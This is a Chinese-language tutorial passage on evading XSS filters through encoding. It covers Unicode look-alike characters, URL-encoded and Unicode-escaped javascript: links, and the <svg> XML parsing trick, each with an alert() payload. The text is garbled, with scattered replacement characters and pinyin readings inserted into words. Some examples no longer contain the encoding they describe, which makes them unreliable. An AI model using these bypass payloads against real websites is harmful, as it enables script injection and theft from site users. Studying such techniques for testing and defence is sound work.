這是目前來說繞過最常用,使用最多的手段了��,利用不同的編碼機制去繞過�����,有幾個例子
例1:
<script>alert(“zac”)</scrIpt>
這是利用了unicode編碼�,將r轉(zhuǎn)換成r來繞過
例2:
如下,經(jīng)過了Html解析之后���,進入href����,就開始url解析了�����,沒有把協(xié)議給編碼,被URL解析器正確識別�。然后URL解析器繼續(xù)解析鏈接剩下的部分,最后就會觸發(fā)xss
<a href='javascript:%61%6c%65%72%74%28%31%29'></a>
%61%6c%65%72%74%28%31%29這行payload解碼就會變?yōu)閍lert(1)
例3
我們來按照瀏覽器的規(guī)律����,解析一下
<a
href='javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(zac)'>
</a>
第一次html解析
第二次url解析
第三次js解析(unicode)
例4 <svg>標簽
當我們的payload的是:
<script>alert(1)</script>
可以發(fā)現(xiàn),瀏覽器屁反應(yīng)都沒有
但是當我們在payload的前加上<svg>的時候
可以發(fā)現(xiàn)�����,界面彈窗了�,這是為啥呢
這是因為解析到<svg>標簽時,瀏覽器就開始使用一套新的標準開始解析后面的內(nèi)容���,直到碰到閉合標簽</svg>�。而在這一套新的標準遵循XML解析規(guī)則����,在XML中實體編碼會自動轉(zhuǎn)義,重新來一遍標簽開啟狀態(tài)���,此時就會執(zhí)行xss了��。
